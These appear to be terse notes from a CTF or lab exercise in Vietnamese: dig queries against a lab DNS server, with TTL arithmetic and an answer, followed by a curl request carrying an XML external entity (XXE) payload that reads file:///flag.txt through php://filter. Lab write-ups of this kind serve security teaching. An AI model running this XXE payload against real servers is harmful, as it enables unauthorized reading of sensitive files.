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dig @10.10.10.10 -p 33140 expiration.osint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Trong phản hồi của máy chủ DNS, trường TTL (Time To Live) được đặt thành 604800.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Giá trị này có nghĩa là các bản ghi DNS cho tên miền expiration.osint nên được lưu trữ trong bộ nhớ đệm trong 604800 giây.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604800 giây tương đương với 7 ngày.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dig @10.10.10.10 -p 33141 hiddentext.osint TXT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dig @10.10.10.10 -p 33143 test.osint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đáp án: 1.1.1.1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curl -x http://localhost:8080 -X POST https://f931cc5a-c596-4258-88ad-2f221bf8216c.web.lms.itmo.xyz/\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-H "Content-Type: application/xml"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 '&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;!DOCTYPE auth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&lt;!ELEMENT auth ANY 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&lt;!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.txt" 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&lt;auth&gt;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&lt;login&gt;&amp;xxe;&lt;/login&gt;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&lt;password&gt;password&lt;/password&gt;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&lt;/auth&gt;'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